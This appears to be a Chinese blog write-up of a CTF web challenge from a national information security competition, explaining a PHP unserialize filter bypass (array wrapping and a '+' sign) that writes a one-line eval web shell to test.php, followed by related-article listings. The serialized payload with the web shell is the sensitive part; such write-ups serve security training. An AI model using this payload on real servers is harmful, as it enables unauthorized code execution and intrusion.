第十二届全国信息安全竞赛——华中赛区(web1)

最新推荐文章于 2023-06-08 19:00:56 发布
最新推荐文章于 2023-06-08 19:00:56 发布
阅读量547 收藏 2
点赞数
分类专栏: CTF题 比赛CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967398/article/details/90730714
版权

第十二届全国信息安全竞赛——华中赛区(web1)

打开题目发现:
在这里插入图片描述
点击Link Start链接看见源码:
在这里插入图片描述
代码审计,经过分析发现反序列化函数以及文件写入函数:
在这里插入图片描述
在这里插入图片描述
但是发现不能以O:开头,也不能O:后面接数字。
不能以O:开头就用数组反序列化,把类放在数组内。至于正则的绕过用+号绕过。
直接在本地用PHP代码进行反序列化:
在这里插入图片描述
得到:
a:1:{i:0;O:7:“BlogLog”:2:{s:4:“log_”;s:10:"./test.php";s:7:“content”;s:25:"<?php eval($_POST[xx]);?>";}}
直接用data参数传入,但是发现无法访问test.php,经过URL编码之后再次传入,成功访问test.php,用菜刀连接:
在这里插入图片描述

得到flag! ! ! ! ! !

A_dmins
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
第十二届全国大学生信息安全竞赛——华中赛区分区选拔赛总结
A_dmin的博客
06-03 965
第十二届全国大学生信息安全竞赛——华中赛区分区选拔赛总结 经历两天的磨难,比赛终于结束了,写个总结安慰一下自己!! 首先,还是非常高兴能够参加这次比赛的,但是也通过这次比赛深深的认识到自己与大佬们直接的差距(被大佬们按在地上摩擦!!)。比赛的时候,大佬们题目一个一个的提交,自己却是盯着屏幕发呆。一个题目,看着好像会做,但实际上动起手来又是另外一回事。 这次的线下赛,总共就只有两类题型,pwn和we...
打一次全国信息安全竞赛华中赛区选拔赛总结
doudoudedi
06-03 268
我们战队排在靠中间的位置 但那些大佬都好强我们完全是被打爆的状态 web题目感受到了其他赛区出题人深深的恶意 经过这次的比赛严重的意识到了自己的pwn能力的不足还是要加强pwn所以要开始学习pwn了 汇编开始 得pwn者得天下 ...
全国大学生信息安全竞赛(线上赛)
XY_4
06-12 2322
第十二届全国大学生信息安全竞赛 0x00 Saleae操作内容: 下载下来是一个”.logdata”文件,百度搜索后,发现需要用到SaleaeLogic,百度搜索它的官网,下载软件 用它打开Saleae.logicdata 一共四个串口,猜测是SPI传输协议,再根据其波形判断 0:规律性 等宽 猜测是 CLK 1:无波形 猜测是主输出端 MOSI 2:波形宽度不一 猜测携带数据...
第十三届全国大学生信息安全竞赛(线上初赛)
A_dmin的博客
08-21 9926
第十三届全国大学生信息安全竞赛(线上初赛) WEB easyphp 打开题目拿到源码: 让进程异常退出,进入到phpinfo中 payload: http://eci-2ze4mvter6u3r4shc9j6.cloudeci1.ichunqiu.com/?a=call_user_func&b=pcntl_wait 运行得到phpinfo,找到flag即可: RCEME 貌似有原题,不过过滤的不一样,这道题没有过滤反撇号: <?php error_reporting(0); h
标准c语言程序设计和应用——华中科技大学出版社第三章课后题.pdf
06-27
标准c语言程序设计和应用——华中科技大学出版社第三章课后题.pdf标准c语言程序设计和应用——华中科技大学出版社第三章课后题.pdf标准c语言程序设计和应用——华中科技大学出版社第三章课后题.pdf标准c语言程序设计...
竞赛资料源码-第二届全国大学生计算机系统能力培养大赛 华中科技大学.zip
最新发布
02-05
竞赛准备:适用于各种教育部认可的竞赛,如全国电子设计大赛、全国大学生智能汽车竞赛等,他们可以借助这些资料了解竞赛的规则、要求和技巧。 学习与项目开发:可以用作毕设、课设、作业和竞赛项目的开发基础,可以...
华中科技大学网安学院信息系统安全实验报告
01-21
包含了全部4次实验,实验四的区块链部分耗时很长,环境配置复杂
华中科技大学信息安全综合设计与实践报告
01-21
信息安全综合设计与实践组队完成,综合运用各种知识进行攻防实践,本小组实现了SQL注入,XSS攻击,tomcat漏洞利用等
华中科技大学信息系统安全实验报告.zip
06-11
华中科技大学信息系统安全实验报告》是对信息安全领域深入探索的一份详实资料,涵盖了软件安全Web安全以及新兴的区块链技术。这篇实验报告旨在通过理论与实践相结合的方式,让学生理解和掌握信息系统安全的关键...
2019全国信息安全大赛
BerL1n
12-29 1049
time: 2019-04-27 11:36 web1 查看源码 然后文件包含,读取hint.php 获取到的源码: http://b61818746d3d4bd9840914f5b107e98298d37d27278746d1.changame.ichunqiu.com/index.php?file=php://filter/read=convert.base64-encode/resource=hint.php 经过base64解码,得到hint.php源码: hint.php <?php
ISCC2023全国大学生网络信息安全竞赛
qq_57423018的博客
06-08 4775
信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越容易遭受攻击,遭受攻击的后果越严重。“网络安全和信息化是一体之两翼、驱动之双轮。没有网络安全就没有国家安全。”信息是社会发展的重要战略资源,国际上围绕信息的获取、使用和控制的斗争愈演愈烈,信息安全保障能力是综合国力、经济竞争实力和生存能力的重要组成部分,是世纪之交世界各国奋力攀登的至高点。
信息安全比赛平台相关收集(CTF比赛)
我的学习笔记
07-12 2414
学习教程与材料: 1、http://www.hackingarticles.in/ 一个外国人的CTF比赛记录博客; 在线实战平台: 1、https://www.hackthebox.eu/home 在线练习题很多,值得看一看,注册时候需要做题的,网上有帮助; 比赛用工具:...
2017全国大学生信息安全竞赛Reverse 填数游戏
ACdream
01-23 1123
CTF reverse
全国大学生信息安全竞赛真题(CTF)
热门推荐
Toufahaizai的博客
04-03 3万+
web篇: https://blog.csdn.net/csu_vc/article/details/78011716 https://www.cnblogs.com/iamstudy/articles/2017_quanguo_ctf_web_writeup.html https://blog.csdn.net/nzjdsds/article/details/81395642 https://b...
2019第十二届全国大学生信息安全竞赛部分WriteUp
极光时流
04-22 4444
第十二届全国大学生信息安全竞赛WriteUp0x00 签到题0x01 SALEAE0x02 24c0x03 easyG00x04 JustSoso0x05 puzzles0x06 usbasp0x07 warmup0x08 love_math0x09 bbvvmm0x10 baby_pwn 0x00 签到题 操作内容: 下载链接,解压并运行软件,对准两个聚焦圆圈,控制台回车输出 flag 0x01...
2019年第十二届全国大学生信息安全竞赛创新实践能力赛(线上初赛)部分wp
黑暗巫妖的博客
04-23 4917
幻影战队第一次参加大型比赛,感谢glzjin,starry07两位队友的配合,在此献上两道wp 逆向easyGo操作内容: 一开始并没有反应过来这是go语言的逆向,只以为是一道linux的C语言逆向,所以直接拖进IDA可是发现没有mian函数,看汇编又啥都看不出来,毕竟我没有系统学习过逆向,然后才从名字联想到go语言,这是一个去符号的go程序,所以IDA添加了IDAGolangHelpe...
web前端网页设计代码_周口职业技术学院金牌专业WEB前端网页设计大赛成功举行...
weixin_28828243的博客
01-20 577
11月12日,格莱科技合作院校-周口职业技术学院金牌专业举办了以创意“视”界为主题的WEB前端网页设计竞赛活动,电子商务(电商平台前端设计方向)专业全体同学以及信息工程系软件技术专业部分同学一起参加了此次比赛。本次比赛旨在考察学生们的网站规划、WEB前端开发、用户体验设计等专业技术能力,展现出格莱金牌专业学生技能与风采,激发学生的求知欲和参与教学活动的热情,以达到“以赛促学”的目的。以赛促教,以赛...
2019年最新《Web 前端开发》等级考试模拟题~以国家 “1+X” 职业技能证书为标准,厚溥推出 Web 前端开发人才培养方案...
Zeus
12-25 1165
转载请注明来源:妙笔生花个人博客http://blog.zh66.club/index.php/archives/438/ 官方QQ群 1+x 证书 Web 前端开发初级理论考试(试卷 13 ) http://blog.zh66.club/index.php/archives/450/ 1+x 证书 Web 前端开发初级实操考试(试卷 13) http://blog.zh66.clu...
数据库大作业_-教务管理系统—华中科技大学.doc
05-18
数据库大作业_-教务管理系统—华中科技大学.doc

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值